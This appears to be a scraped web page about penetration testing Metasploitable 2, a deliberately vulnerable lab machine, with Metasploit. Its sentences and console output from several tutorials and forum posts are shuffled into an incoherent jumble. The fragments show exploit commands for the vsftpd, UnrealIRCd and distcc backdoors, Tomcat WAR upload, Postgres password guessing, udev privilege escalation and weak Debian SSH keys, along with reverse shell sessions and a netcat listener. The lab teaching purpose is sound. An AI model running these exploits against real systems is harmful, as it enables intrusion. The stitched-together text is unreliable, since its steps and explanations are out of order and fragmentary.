---- --------------- -------- ----------- Getting access to a system with a writeable filesystem like this is trivial. msf exploit(drb_remote_codeexec) > set payload cmd/unix/reverse SRVPORT 8080 yes The local port to listen on. The advantage is that these commands are executed with the same privileges as the application. USERNAME postgres yes The username to authenticate as msf exploit(distcc_exec) > exploit -- ---- msf exploit(udev_netlink) > show options [*] Found shell. PASSWORD => tomcat This tutorial shows how to install it in Ubuntu Linux, how it works, and what you can do with this powerful security auditing tool. What is Metasploit This is a tool developed by Rapid7 for the purpose of developing and executing exploits against vulnerable systems. ---- --------------- -------- ----------- msf exploit(twiki_history) > set RHOST 192.168.127.154 [*] Matching msf exploit(tomcat_mgr_deploy) > set RHOST 192.168.127.154 Vulnerable Products: Microsoft Office 2007 SP3/2010 SP2/2013 SP1/2016, Vista SP2, Server 2008 SP2, Windows 7 SP1, Windows 8.1. And this is what we get: Then start your Metasploit 2 VM, it should boot now. msf exploit(tomcat_mgr_deploy) > show option root, msf > use exploit/unix/irc/unreal_ircd_3281_backdoor This version contains a backdoor that went unnoticed for months - triggered by sending the letters "AB" following by a system command to the server on any listening port. Samba, when configured with a writeable file share and "wide links" enabled (default is on), can also be used as a backdoor of sorts to access files that were not meant to be shared. [*] Writing to socket B When we performed a scan with Nmap during scanning and enumeration stage, we have seen that ports 21,22,23 are open and running FTP, Telnet and SSH . root. Additionally, an ill-advised PHP information disclosure page can be found at http:///phpinfo.php. Name Current Setting Required Description Module options (auxiliary/scanner/smb/smb_version): The applications are installed in Metasploitable 2 in the /var/www directory. Exploit target: This document will continue to expand over time as many of the less obvious flaws with this platform are detailed. Login with the above credentials. THREADS 1 yes The number of concurrent threads It is freely available and can be extended individually, which makes it very versatile and flexible. Name Current Setting Required Description RETURN_ROWSET true no Set to true to see query result sets This is Metasploitable2 (Linux) Metasploitable is an intentionally vulnerable Linux virtual machine. msf exploit(twiki_history) > show options We are interested in the Victim-Pi or 192.168.1.95 address because that is a Raspberry Pi and the target of our attack.. Our attacking machine is the kali-server or 192.168.1.207 Raspberry Pi. RHOSTS yes The target address range or CIDR identifier exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent VSFTPD v2.3.4 Backdoor Command Execution, msf > use exploit/unix/ftp/vsftpd_234_backdoor -- ---- Id Name The default login and password is msfadmin:msfadmin. [*] Attempting to automatically select a target RPORT 80 yes The target port Compatible Payloads Use the showmount Command to see the export list of the NFS server. 0 Automatic Upon a hit, Youre going to see something like: After you find the key, you can use this to log in via ssh: as root. msf auxiliary(telnet_version) > show options By discovering the list of users on this system, either by using another flaw to capture the passwd file, or by enumerating these user IDs via Samba, a brute force attack can be used to quickly access multiple user accounts. The example below uses a Metasploit module to provide access to the root filesystem using an anonymous connection and a writeable share. I've done exploits from kali linux on metasploitable 2, and i want to fix the vulnerabilities i'm exploiting, but all i can find as a solution to these vulnerabilities is using firewalls or filtering ports. STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host Exploit target: Accessing it is easy: In addition to the malicious backdoors in the previous section, some services are almost backdoors by their very nature. DVWA is PHP-based using a MySQL database and is accessible using admin/password as login credentials. Step 11: Create a C file (as given below) and compile it, using GCC on a Kali machine. Metasploitable is installed, msfadmin is user and password. Then, hit the "Run Scan" button in the . For further details beyond what is covered within this article, please check out the Metasploitable 2 Exploitability Guide. However the .rhosts file is misconfigured. Step 7: Bootup the Metasploitable2 machine and login using the default user name and Password: In this tutorial, we will walk through numerous ways to exploit Metasploitable 2, the popular vulnerable machine from Rapid7. List of known vulnerabilities and exploits . Tutorials on using Mutillidae are available at the webpwnized YouTube Channel. [*] Reading from sockets [*] Reading from sockets In our previous article on How To install Metasploitable we covered the creation and configuration of a Penetration Testing Lab. Name Current Setting Required Description www-data, msf > use auxiliary/scanner/smb/smb_version Exploit target: I employ the following penetration testing phases: reconnaisance, threat modelling and vulnerability identification, and exploitation. [*] trying to exploit instance_eval A vulnerability in the history component of TWiki is exploited by this module. msf exploit(drb_remote_codeexec) > set URI druby://192.168.127.154:8787 In our testing environment, the IP of the attacking machine is 192.168.127.159, and the victim machine is 192.168.127.154. To make this step easier, both Nessus and Rapid7 NexPose scanners are used locate potential vulnerabilities for each service. Module options (exploit/unix/ftp/vsftpd_234_backdoor): [*] Accepted the second client connection Since this is a mock exercise, I leave out the pre-engagement, post-exploitation and risk analysis, and reporting phases. ---- --------------- -------- ----------- now you can do some post exploitation. PASSWORD no The Password for the specified username [*] Writing to socket A 0 Automatic Target These backdoors can be used to gain access to the OS. The command will return the configuration for eth0. whoami Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. On metasploitable there were over 60 vulnerabilities, consisting of similar ones to the windows target. For more information on Metasploitable 2, check out this handy guide written by HD Moore. RHOSTS => 192.168.127.154 0 Linux x86 You can view CVE vulnerability details, exploits, references, metasploit modules, full list of vulnerable products and cvss score reports and vulnerability trends over time (e.g. now i just started learning about penetration testing, unfortunately now i am facing a problem, i just installed GVM / OpenVas version 21.4.1 on a vm with kali linux 2020.4 installed, and in the other vm i have metasploitable2 installed both vm network are set with bridged, so they can ping each other because they are on the same network. Enter the required details on the next screen and click Connect. If the application is damaged by user injections and hacks, clicking the "Reset DB" button resets the application to its original state. Using Metasploit and Nmap to enumerate and scan for vulnerabilities In this article, we will discuss combining Nmap and Metasploit together to perform port scanning and enumerate for. RPORT 23 yes The target port meterpreter > background msf auxiliary(postgres_login) > set RHOSTS 192.168.127.154 A Reset DB button in case the application gets damaged during attacks and the database needs reinitializing. There are the following kinds of vulnerabilities in Metasploitable 2- Misconfigured Services - A lot of services have been misconfigured and provide direct entry into the operating system. Have you used Metasploitable to practice Penetration Testing? Time for some escalation of local privilege. msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.127.154 One way to accomplish this is to install Metasploitable 2 as a guest operating system in Virtual Box and change the network interface settings from "NAT" to "Host Only". Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit.This set of articles discusses the RED TEAM's tools and routes of attack. Metasploitable is a Linux virtual machine which we deliberately make vulnerable to attacks. During that test we found a number of potential attack vectors on our Metasploitable 2 VM. Copyright 2023 HackingLoops All Rights Reserved, nmap -p1-65535 -A 192.168.127.154 msf exploit(vsftpd_234_backdoor) > show options The Metasploit Framework is the most commonly-used framework for hackers worldwide. Version 2 of this virtual machine is available for download and ships with even more vulnerabilities than the original image. URI => druby://192.168.127.154:8787 The payload is uploaded using a PUT request as a WAR archive comprising a jsp application. RHOSTS yes The target address range or CIDR identifier The vulnerabilities identified by most of these tools extend . A test environment provides a secure place to perform penetration testing and security research. [+] 192.168.127.154:5432 Postgres - Success: postgres:postgres (Database 'template1' succeeded.) [*] A is input The two dashes then comment out the remaining Password validation within the executed SQL statement. root 2768 0.0 0.1 2092 620 ? : CVE-2009-1234 or 2010-1234 or 20101234) We performed a Nessus scan against the target, and a critical vulnerability on this port ispresent: rsh Unauthenticated Access (via finger Information). Here are the outcomes. msf exploit(distcc_exec) > show options Exploit target: Exploiting All Remote Vulnerability In Metasploitable - 2. After the virtual machine boots, login to console with username msfadmin and password msfadmin. The same exploit that we used manually before was very simple and quick in Metasploit. nc -vv -l -p 5555 < 8572, sk Eth Pid Groups Rmem Wmem Dump Locks RHOSTS yes The target address range or CIDR identifier [*] Command shell session 1 opened (192.168.127.159:4444 -> 192.168.127.154:46653) at 2021-02-06 22:23:23 +0300 Step 1:Type the Virtual Machine name (Metasploitable-2) and set the Type: Linux. Setting 3 levels of hints from 0 (no hints) to 3 (maximum hints). Armitage is very user friendly. I thought about closing ports but i read it isn't possible without killing processes. [*] Started reverse handler on 192.168.127.159:8888 On July 3, 2011, this backdoor was eliminated. [*] Reading from socket B RHOSTS yes The target address range or CIDR identifier Metasploitable3 is a VM that is built from the ground up with a large amount of security vulnerabilities. Least significant byte first in each pixel. RPORT 80 yes The target port Nessus, OpenVAS and Nexpose VS Metasploitable. It is a pre-built virtual machine, and therefore it is simple to install. This set of articles discusses the RED TEAM's tools and routes of attack. Id Name We can demonstrate this with telnet or use the Metasploit Framework module to automatically exploit it: On port 6667, Metasploitable2 runs the UnreaIRCD IRC daemon. Target the IP address you found previously, and scan all ports (0-65535). An attacker can implement arbitrary OS commands by introducing a rev parameter that includes shell metacharacters to the TWikiUsers script. The-e flag is intended to indicate exports: Oh, how sweet! To proceed, click the Next button. Notice that it does not function against Java Management Extension (JMX) ports as they do not allow remote class loading unless some other RMI endpoint is active in the same Java process. [*] Successfully sent exploit request Were not going to go into the web applications here because, in this article, were focused on host-based exploitation. Vulnerability assessment tools or scanners are used to identify vulnerabilities within the network. Browsing to http://192.168.56.101/ shows the web application home page. Welcome to the MySQL monitor. msf auxiliary(tomcat_administration) > set RHOSTS 192.168.127.154 USERNAME no The username to authenticate as Backdoors - A few programs and services have been backdoored. The backdoor was quickly identified and removed, but not before quite a few people downloaded it. RHOST yes The target address In the next tutorial we'll use metasploit to scan and detect vulnerabilities on this metasploitable VM. -- ---- ---- --------------- -------- ----------- Metasploitable Databases: Exploiting MySQL with Metasploit: Metasploitable/MySQL. msf exploit(udev_netlink) > exploit Id Name Luckily, the Metasploit team is aware of this and released a vulnerable VMware virtual machine called 'Metasploitable'. payload => cmd/unix/interact Be sure your Kali VM is in "Host-only Network" before starting the scan, so you can communicate with your target Metasploitable VM. Sources referenced include OWASP (Open Web Application Security Project) amongst others. [*] Scanned 1 of 1 hosts (100% complete) 22. msf exploit(postgres_payload) > use exploit/linux/local/udev_netlink -- ---- Inspired by DVWA, Mutillidae allows the user to change the "Security Level" from 0 (completely insecure) to 5 (secure). When hacking computer systems, it is essential to know which systems are on your network, but also know which IP or IPs you are attempting to penetrate. Version 2 of this virtual machine is available for download and ships with even more vulnerabilities than the original image. The purpose of a Command Injection attack is to execute unwanted commands on the target system. What Is Metasploit? msf exploit(java_rmi_server) > show options True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0. Metasploit has a module to exploit this in order to gain an interactive shell, as shown below. msf exploit(unreal_ircd_3281_backdoor) > set LHOST 192.168.127.159 Were going to use this exploit: udev before 1.4.1 does not validate if NETLINK message comes from the kernel space, allowing local users to obtain privileges by sending a NETLINK message from user space. msf2 has an rsh-server running and allowing remote connectivity through port 513. Remote code execution vulnerabilities in dRuby are exploited by this module. [*] Uploading 13833 bytes as RuoE02Uo7DeSsaVp7nmb79cq.war VERBOSE false no Enable verbose output 5.port 1524 (Ingres database backdoor ) Before running it, you need to download the pre-calculated vulnerable keys from the following links: http://www.exploit-db.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2 (RSA keys), http://www.exploit-db.com/sploits/debian_ssh_dsa_1024_x86.tar.bz2 (DSA keys), ruby ./5632.rb 192.168.127.154 root ~/rsa/2048/. Previous versions of Metasploitable were distributed as a VM snapshot where everything was set up and saved in that state . First lets start MSF so that it can initialize: By searching the Rapid7 Vulnerability & Exploit Database we managed to locate the following TWiki vulnerability: Alternatively the command search